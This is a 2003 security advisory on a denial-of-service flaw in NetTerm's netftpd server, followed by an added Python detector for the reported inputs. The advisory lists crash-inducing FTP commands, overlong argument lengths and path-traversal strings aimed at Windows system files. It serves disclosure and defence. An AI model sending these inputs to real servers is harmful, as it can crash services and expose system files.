------------------------------------------------------------------
- EXPL-A-2003-017 exploitlabs.com Advisory 017
------------------------------------------------------------------
-= netterm netftpd =-

Donnie Werner
July 18, 2003
http://exploitlabs.com

Vulnerability(s):
----------------
1. Remote / Local Denial of Service

Product:
--------
netftpd.exe is integral to netterm - 4.2.8.e(i) [current]
all versions through current are affected

Description of product:
-----------------------
"NetTerm is a Windows based terminal emulator with fast zmodem file
transfers. It can also be used as a dialer program for SLIP/PPP and
includes a built in scripting language. For Internet hosts, the telnet
protocol is enabled with VT100 and full ANSI graphics. A ftp server is
included. Transparent printing and local host editing is supported for
UNIX. nt3242e.exe - 32 bit InterSoft@compuserve.com"

http://www.securenetterm.com/pub/nt3242ei.exe
http://www.netterm.com
http://securenetterm.com/html/downloads.html

VULNERABILITY / EXPLOIT
======================

By default netftpd uses c:\ as its base ftproot.

netftpd.exe started with defaults
server: Windows XP Professional

----------- snip -------------
root@linuxbitch:/#ftp vunerable[host].com
220 NetTerm FTP server ready [ctllf][ctllf]
ftp>cd /windows/system32
ftp>ls ( or dir )
---------- snip --------------

The remote ftpd server crashes.

With logging and trace enabled in the options,
netftpd does not log any commands when crashed.

Sample crash output:

error1:
The instruction at "0x77f551c0" referenced memory at "0x00000000".
the memory could not be "read"
Click OK to terminate program

error2:
The instruction at "0x77f5310f" referenced memory at "0x656e776f"
the memory could not be "written"
Click OK to terminate program

These produce some odd behavior as well ( in a browser ):

ftp://[host]/c:%5C/c:%5C/../../
ftp://[host]/c:%5C/../../././././././././
ftp://[host]/../boot.ini

DrInsane helped with these...

If you send any of these, the ftp server will crash :)
Even the user command has a problem.

Cwd [a] * 518
User [a] * 1110
List [a] * 518
Stu [a] * 518
Port [a] * 1110
Type [a] * 1110
Mkd [a] * 1110
Dele [a] * 1110
Rmd [a] * 1110

You can also try to give strings in your browser using HTML chars
like: (just for fun)

/%5c..%5c..%5c..%5cwindows%5cwin%2eini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat

DrInsane also has written a sample prog that will crash the ftp.
(http://members.lycos.co.uk/r34ct/main/godzillaDosTool/).

Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
Concurrent with this advisory
support@securenetterm.com

Credits:
--------
Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com

I would like to thank DrInsane and Nutcase for the input and help

Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-017-netftpd.txt
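
A defender-side check for the command lengths and traversal strings
listed in this advisory, added here as an example and not part of the
original advisory or of any vendor code. It flags FTP control-channel
lines for logging or blocking in front of the server; the function
names, the 50% length margin and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Argument lengths at which the advisory reports a crash (verbs as listed there).
CRASH_LEN = {"CWD": 518, "USER": 1110, "LIST": 518, "STU": 518, "PORT": 1110,
             "TYPE": 1110, "MKD": 1110, "DELE": 1110, "RMD": 1110}
MARGIN = 0.5  # assumption: alert at half the reported length, tune per site
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # ../ or ..\ path component
DRIVE = re.compile(r"(^|[\\/])[A-Za-z]:")           # c: used as a path component


def decode(arg: str) -> str:
    """Percent-decode up to three times so %5c and %255c both become a backslash."""
    for _ in range(3):
        nxt = unquote(arg)
        if nxt == arg:
            break
        arg = nxt
    return arg


def inspect(line: str) -> list[str]:
    """Return the reasons one FTP command line looks suspicious (empty if none)."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    verb, reasons = verb.upper(), []
    limit = CRASH_LEN.get(verb)
    if limit and len(arg) >= limit * MARGIN:
        reasons.append("overlong argument")
    path = decode(arg)  # assumption: logs may carry the encoded form
    if TRAVERSAL.search(path):
        reasons.append("path traversal")
    if DRIVE.search(path):
        reasons.append("drive-letter path")
    return reasons


def scan(lines):
    """Yield (line number, verb, reasons) for every flagged line."""
    for n, line in enumerate(lines, 1):
        reasons = inspect(line)
        if reasons:
            yield n, line.split(" ", 1)[0].upper(), reasons


# Constructed sample of control-channel lines, not captured traffic.
SAMPLE = ["USER anonymous", "CWD /pub", "CWD " + "a" * 518,
          "CWD /%5c..%5c..%5cwindows%5cwin%2eini", "RETR c:%5C/../../x"]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The cd /windows/system32 followed by ls crash shown in the advisory
uses no unusual strings, so these rules do not catch it.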